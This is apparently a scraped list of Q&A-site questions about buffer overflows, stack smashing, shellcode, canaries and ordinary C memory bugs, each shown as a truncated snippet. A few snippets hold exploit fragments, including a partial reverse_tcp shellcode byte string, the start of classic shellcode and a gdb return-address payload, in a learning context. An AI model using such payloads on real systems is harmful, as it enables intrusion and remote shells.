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Usually occurs when you attempt to copy data into a buffer without checking for sufficient space, causing data to be overwritten in neighboring cells.

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Null terminating using movb causes segmentation fault

This is my linux64 assembly code (working fine): .text .globl _start .type _start, @function _start: pushq %rbp movq %rsp, %rbp subq $16, %rsp jmp helper ...
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buffer overflow - unable to overwrite return address

Trying a buffer overflow to overwrite return address on stack for the following program. I want to call accept on both case of strcmp() void accept() { printf ("\nAccess Granted!\n"); return; } ...
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Shuffled order of bytes in gdb when using perl print statement in ubuntu

run $(perl -e 'print "\xfd\x06\x40\x00" x 10') When I run my program with this argument I should get 0x004006fd as the word in the stack but instead I get a rearranged order of this word but never ...
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Exploit development in Python 3

I realised that exploit development with python 3 is not as straight forward as it is using python 2. As I understand, this is mainly due to the socket library and the added byte datatype. For ...
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How is the shell code of a Buffer Overflow generated

The following codes got my curiosity. I always look, search, and study about the exploit so called "Buffer overflow". I want to know how the code was generated. How and why the code is running? char ...
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Different comportement of read

I'm trying to understand why this program return different errors when I change the size of the buffer: #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno....
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log module with pre-allocated memory

I am writing a logging mechanism that will be used by the rest of the code to log alphanumeric data to file. Every other module in the system will be sending alphanumeric sentences (a couple of words ...
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Is there a way to "overload" or reimplement __stack_chk_fail?

I want to enable stack protection feature in gcc for a system i am building that run on x86 linux. I want that if it detects stack smashing it would call a function of my own that will handle the ...
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How do canary words allow gcc to detect buffer overflows?

I could test using strncpy() with larger source string then the destination: int main() { char *ptr = malloc(12); strcpy(ptr,"hello world!"); return 0; } Compiling with the flag -fstack-...
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return to libc attack using a function pointer

How should I format my input for the return to libc attack in the following code: void example_function(int x, const char *name) { void (*foo)(int, const char *) = http_serve_none; char buf[...
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Why am I getting the message “Single-stepping until exit from function shellcode which has no line number information” in GDB?

I tried to use buffer overflow to rewrite my function's return address,and it worked.but when i try to step through the function(stored in the char array),I get the message: "Single stepping until ...
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Undefined Behavior quirk: reading outside a buffer causes a loop to never terminate?

I wrote a very trivial program to try to examine the undefined behavior attached to buffer overflows. Specifically, regarding what happens when you perform a read on data outside the allocated space. ...
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How to send arbitary bytes to STDIN of a program in gdb?

I am developing buffer overflow exercises for students. In this context you often have to provide arbitary bytes as input for programs (return addresses). Assume this example: #import <stdio.h>...
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Address of Operator for buffer in C

I am reading the book "Hacking:Art of Exploitation",I am struggling to understand the following code: int main(int argc, char *argv[]) { int value = 5; char buffer_one[8],...
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Vertex Buffer Is not updated well

Hi guys i have a cube drawed using opengles. Every time that i call redraw function i update the coordinates_buffer using this code floatBuffer.position(0); floatBuffer.put(coordinates); floatBuffer....
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buffer overflow during memory reallocation

I was making a C program to convert 12 hour clock into 24 hour clock with the format of input being HH:MM:SSAM or HH:MM:SSPM and 24hr clock output being HH:MM:SS #include <stdio.h> #include <...
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C: IF statement not firing when expected

I have the following function. The executable runs fine. At the prompt, after the program is run, I enter \x0037337331, the value of B is set as B: 0x31333337 Any advice on how I'd trigger to open ...
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Why reverse_tcp Shellcode doesn't work?

I am using this shellcode: \x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
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Buffer overflow needs 16 bytes on x86 but 29 bytes on x64

#include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buff[15]; int auth = 0; printf("\nEnter password: "); gets(buff); if (strcmp(buff, "password") != ...
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C Simple Buffer Overflow Shellcode location

I'm trying to understand the basic principles of buffer overflows. During countless hours of reading one of the things I noted was: Most of the time the exploit string structure looks like this, ...
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What's the point of Position-independent executables (PIE) when we have execstack?

I'm reading Hacking: The art of exploitation, which is apparently full of outdated information (doesn't take into account canaries, non executable stack, ASLR). I am trying to understand whether (and ...
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C Simple Buffer Overflow

I'm trying to learn how buffer overflows work and how this can be used. I'm solving a simple challenge (backdoorlabs echo challenge) by trying to exploit a supplied binary file. (see: http://hack....
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Segmentation fault on buffer buffer overflow

I tried to learn how buffer overflow works and I did some exercises from exploit-exercises.com. I tried to solve Protostar Stack 5 problem. The code is writen in C. Here is the code: #include <...
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Does gets() ignore '\0'?

I am learning about buffer overrun with this source code: #include <stdio.h> int main() { char buf[16]; gets(buf); printf("buf @ %8p\n", (void*)&buf); return 0; } I try to ...
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How to check if user input fits in variable?

I'm trying to write a simple program to calculate a function with Fortran95/03 which needs as input a number(x) and gets as output a number(y). The user input is a real :: input and the read call ...
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Buffer overflow or something else

I am creating a program, about seat reservations. I was asked to use unsigned short and unsigned int for some of the variables, so that is why they are set like that. I have a program that works ok. ...
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values of array gets changed automatically after taking string input

#include <iostream> #include <math.h> using namespace std; int main() { long int m,i; cin>>m; float first=0,second=0,disp=0; int arr[m]; char ch[m]; for(i=0;...
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Behavior of char pointer [duplicate]

I am really confused about the following: char *list = malloc(sizeof(char)); list[0] = 'a'; list[1] = 'b'; printf("%s\n", list); My expectation was some kind of undefined behavior, because list has ...
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Debugging vulnerable binary using GDB

I'm trying to exploit this vulnerable code from Phrack Magazine. This is the code of the vulnerable binary: #include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ ...
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Why code in stack or heap segment can be executed?

In the security field, there are heap exploitation and stack smashing attack. But I found that /proc/*/maps file, the heap and stack segment, only have rw-p-permission. There is no execution ...
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Program crashes when malloc executed

My code keeps crashing when I execute *arr = malloc(i * sizeof(struct cluster_t*));. Cluster is a structure. I am not sure what is the problem. The second input is an array of structures (clusters) It ...
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Cosolidating large excel files, cant go around buffer overflow

I am trying to consolidate multiple large excel files into one single file using the following code Sub Macro1() Application.DisplayAlerts = False Dim Country As String Dim i As Integer ...
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Function Call Segmentation Fault

I'm trying to reproduce a buffer overflow attack here and I'm stuck with the implementation of the shell code as I get a segmentation fault when I assemble and execute it. Seeing what GDB says, it ...
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How could the following code be adjusted to prevent a buffer overflow? [closed]

void updateConfigParams( void ) { char buffer [512]; int i = 0; while (( c = readFromWireless ()) != NULL) { buffer [ i ] = c; i += 1; } writeConfigParams ( buffer ); } I'm only ...
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What explains this behavior of C compiler w.r.t string initialization?

The following code doesn't generate a null terminator /* Case 1 */ #include <stdio.h> void main () { char wbuf[16] = "0123456789abcdef"; printf("%s\n", wbuf); } See the relevant parts ...
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Why is initializing C union using "designated initializer" giving random values?

I had a "bug" which I spent quite a while chasing: typedef union { struct { uint8_t mode: 1; uint8_t texture: 4; uint8_t blend_mode: 2; }; uint8_t key; } ...
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Buffer overflows: writing 7 in hexadecimal without 'null terminator' (0x00)

I'm trying to exploit a buffer overflow vulnerability to overwrite the return address of the stack. However the code I'm trying to 'hack' makes use canary system. It initializes an integer always to ...
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Hexadecimal Memory Address to Assembly

I am following a buffer overflow tutorial. I have set up my NOP block, I also set up my shell code, now I need to append the return address to the end of my string. I know my return address is : ...
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$esp register not found

I am learning debugging with gdb and registers, but I am stuck in one point. As an instruction, I should print print $esp result: $1 = -9008 but I was expecting such result: $2 = (void *) ...
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Return Oriented Programming Stripped Binaries

Good morning, I have a stripped binary, and I have to bypass ASLR and NX. I am fighting since three days to find a solution but I cannot find one. I cannot find the libraries linked to the binary as ...
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how to write an buffer overflow?

I've been doing buffer overflow test, mostly I read from Aleph One's Smashing The Stack For Fun And Profit. #include<string.h> #include<stdio.h> char shellcode[]="\x31\xc0\xb0\x46\x31\...
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C Mysterious Overflow

Why does this code output -32768 and not 32768? Looks like an overflow but I cannot figure out where. #include <stdio.h> #include <stdlib.h> int main() { char *buffer = (char*)malloc(...
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Overflow saved RIP register value with short address

I'm trying to do buffer overflow where I need to rewrite the saved RIP register value with an address. The address is short (8 bytes), for example, 0x0000000012345678. The RIP register is 16 bytes, ...
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Replace deprecated gets()

I am using the SLM toolkit by CMU-Cambridge for some baseline language modeling on language data, but when I run one of the built executables, my system detects a buffer overflow when it tries to ...
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Entering ascii into html text box

I'm doing a cybersecurity capture the flag challenge and attempting to do buffer overflow on a server. it has an html text box that I'm trying to overflow with particular values. How can I enter ascii ...
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pointer segfault vs undefined behavior

Why does this code produce a segfault when running regularly, but undefined behavior instead of a segfault if I either add a command line argument or comment out calling the cpy function? #include &...
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How could a buffer overflow attack on the updateConfigParams() function be exploited to disable the program?

Considering the following function void updateConfigParams( void ) { char buffer [512]; int i = 0; while (( c = readFromWireless ()) != NULL) { buffer [ i ] = c; i +=...
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Difference between scanf's width specification and scanf_s

scanf_s("%s", a, 10); This code will protect our program from buffer overflow exploit. But without scanf_s, we can write: scanf("%9s", a); I think this code will also block buffer overflow. Is ...
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mips assembly display string using buffer overflow

I am practicing buffer overflow and assembly coding. Right now I am able to find return address, and jump to anywhere inside the program itself. However, I want to do more than just jump to itself, I ...
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No epb/eip registers in gdb "info frame"

Context When issuing the command info frame on my machine (with break point on main), the output is as follows: (gdb) info frame Stack level 0, frame at 0x7fffffffdbd0: rip = 0x4005b1 in main; saved ...
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